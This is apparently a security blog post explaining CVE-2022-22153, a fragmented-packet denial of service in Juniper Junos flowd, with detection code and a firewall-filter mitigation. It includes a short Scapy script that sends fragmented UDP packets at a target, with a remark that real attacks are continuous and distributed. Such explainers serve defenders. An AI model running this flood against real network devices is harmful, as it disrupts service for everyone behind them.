The security of network appliances is critical, especially for devices in enterprise environments. In early 2022, Juniper Networks disclosed CVE-2022-22153, a vulnerability that affects the flow processing daemon (flowd) in Junos OS, specifically on SRX Series and MX Series routers with SPC3 service cards. This vulnerability allows remote, unauthenticated attackers to severely disrupt network performance simply by sending specially crafted fragmented packets.

Let's break down what this vulnerability is, how it can be exploited, and what you can do to protect your network.

CVE-2022-22153 combines two weaknesses:

- Insufficient Algorithmic Complexity: The reassembly algorithm struggles with certain types of packet fragments.
- Unlimited Resource Allocation: flowd does not sufficiently limit how much memory or CPU time is spent reassembling IP fragments.

> Affected Platforms:  
> - Juniper SRX Series, MX Series with SPC3  
> - Junos OS < 18.2R3, 18.3R3, 18.4R2-S9/18.4R3, 19.1R2, and certain 19.2 releases (full details)

Technical Description

Juniper's flowd is responsible for inspecting and processing network traffic. Whenever fragmented packets arrive (e.g., big UDP packets split into multiple IP fragments), flowd must reassemble these before forwarding them.

If more than 5% of the incoming traffic is made up of IP fragments, especially lots of small, random, or overlapping fragments, flowd's memory and CPU consumption rises dramatically. Eventually, this causes:

- Packet drops
- DoS (Denial of Service) conditions on the firewall/router

No authentication is needed—this bug can be triggered by any attacker who can send malicious packets to the device.

How an Attacker Triggers the Vulnerability

An attacker simply floods the target Juniper box with a high volume of fragmented IP packets. The key is to send crafted fragments such that flowd has to perform a lot of processing to try to reassemble them.

Example Attack (Python pseudocode)

Below is a simplified attack concept using Scapy to send fragmented UDP packets to a Juniper firewall:

```python
from scapy.all import IP, UDP, Raw, fragment, send
import random

target_ip = "198.51.100.1"
target_port = 450

# Craft a large UDP payload, forcing IP fragmentation
data = b"A" * 500

# Create base packet
pkt = IP(dst=target_ip) / UDP(dport=target_port, sport=random.randint(1024, 65535)) / Raw(load=data)

# Fragment the packet: about 100 bytes of payload per fragment (5 fragments)
frags = fragment(pkt, fragsize=100)

# Send fragments in a stream (verbose=0 suppresses Scapy's per-packet output)
for frag in frags:
    send(frag, verbose=0)
```

> Note: In a real attack, the stream would be continuous, randomized, and likely come from multiple distributed sources (DDoS).

- Just a few hosts sending fragmented traffic can saturate the target's flowd processing.
- All other traffic passing through the box (including legitimate users and business services) is impacted.

Detection

- Symptoms: Increased latency, CPU spikes, high flowd memory, and dropped packets, especially during heavy (or malformed) fragmented traffic
- Log messages: Flowd is not generally verbose about breakdowns; monitor system logs and flowd process stats
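As an added illustration of the detection heuristics above (this is not code from the advisory or the original post), the following script parses raw IPv4 headers, measures what share of a capture window is fragments against the 5% figure quoted earlier, and flags overlapping fragments. The packets are constructed inline for the demonstration; the alert threshold, the group-by key and the addresses are assumptions.

```python
import struct
from collections import defaultdict
FRAGMENT_RATIO_THRESHOLD = 0.05  # advisory figure (assumed as an alert threshold): >5% fragments degrades flowd

def parse_ipv4(pkt):
    """Parse the fixed 20-byte IPv4 header into the fields fragment analysis needs."""
    (ver_ihl, _tos, total_len, ident, flags_off, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    return {"key": (src, dst, ident, proto),          # identifies one reassembly group (RFC 791)
            "mf": bool(flags_off & 0x2000),           # More Fragments flag
            "offset": (flags_off & 0x1FFF) * 8,       # fragment offset, stored in 8-byte units
            "length": total_len - (ver_ihl & 0x0F) * 4}  # payload bytes carried by this packet

def fragment_stats(packets):
    """Count fragments, distinct reassembly groups and overlapping fragments in a capture window."""
    seen = defaultdict(list)  # reassembly key -> [(start, end)] byte ranges already received
    stats = {"total": 0, "fragments": 0, "groups": 0, "overlaps": 0}
    for raw in packets:
        hdr = parse_ipv4(raw)
        stats["total"] += 1
        if not (hdr["mf"] or hdr["offset"]):         # neither MF nor a nonzero offset: not a fragment
            continue
        stats["fragments"] += 1
        start, end = hdr["offset"], hdr["offset"] + hdr["length"]
        if hdr["key"] not in seen:
            stats["groups"] += 1
        # Overlap: this fragment re-covers bytes an earlier fragment of the same datagram supplied.
        if any(start < e and s < end for s, e in seen[hdr["key"]]):
            stats["overlaps"] += 1
        seen[hdr["key"]].append((start, end))
    stats["ratio"] = stats["fragments"] / stats["total"] if stats["total"] else 0.0
    return stats

def is_suspicious(stats, threshold=FRAGMENT_RATIO_THRESHOLD):
    return stats["ratio"] > threshold or stats["overlaps"] > 0  # fragment share too high, or overlaps seen

def make_ipv4(src, dst, ident, offset, mf, payload_len, proto=17):
    """Build a constructed test packet: raw IPv4 header plus zero payload (checksum left as 0)."""
    flags_off = (0x2000 if mf else 0) | (offset // 8)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, flags_off, 64, proto, 0,
                      bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return hdr + b"\x00" * payload_len

# Constructed capture: 40 ordinary datagrams, then small fragments from one source, two overlapping.
SAMPLE = [make_ipv4("192.0.2.10", "198.51.100.1", i, 0, False, 64) for i in range(40)]
SAMPLE += [make_ipv4("192.0.2.99", "198.51.100.1", 7000 + i, 0, True, 80) for i in range(8)]
SAMPLE += [make_ipv4("192.0.2.99", "198.51.100.1", 7000, 48, True, 80),   # overlaps bytes 48..80 of id 7000
           make_ipv4("192.0.2.99", "198.51.100.1", 7001, 0, True, 80)]    # duplicate of id 7001's range
```

Feeding `fragment_stats` the packets of a sliding window from a span port or pcap gives a per-window fragment ratio and overlap count that can be alerted on alongside the flowd CPU and memory counters.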

Mitigation

1. Upgrade Junos OS

Juniper released patches; see the official Juniper Security Advisory for the fixed versions.

2. Filter Fragmented Packets

- Use firewall filters (access lists) to block or rate-limit fragmented IP packets from untrusted sources, if possible. The Junos match condition is-fragment catches trailing fragments only; add a term matching first-fragment if first fragments should be dropped as well, and apply the filter as an input filter on the untrusted interface. Without a from clause the FRAG term would discard all traffic.

```
set firewall family inet filter BLOCK_FRAG term FRAG from is-fragment
set firewall family inet filter BLOCK_FRAG term FRAG then discard
set firewall family inet filter BLOCK_FRAG term DEFAULT then accept
```

3. Monitor Resource Usage

- Proactive monitoring of flowd process stats, and automated alerts on abnormal CPU/memory/pkt drop stats

Conclusion

CVE-2022-22153 is a textbook case of how even high-end security appliances can be crippled by algorithmic complexity attacks. It is both easy to exploit and hard to detect until business traffic begins to suffer. Timely upgrading and limiting access to untrusted fragmented packets is essential.

Further Reading & References:  
- Juniper Security Bulletin  
- NIST NVD Entry  
- Scapy Official Documentation

Timeline

Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/28/2022 17:55:00 UTC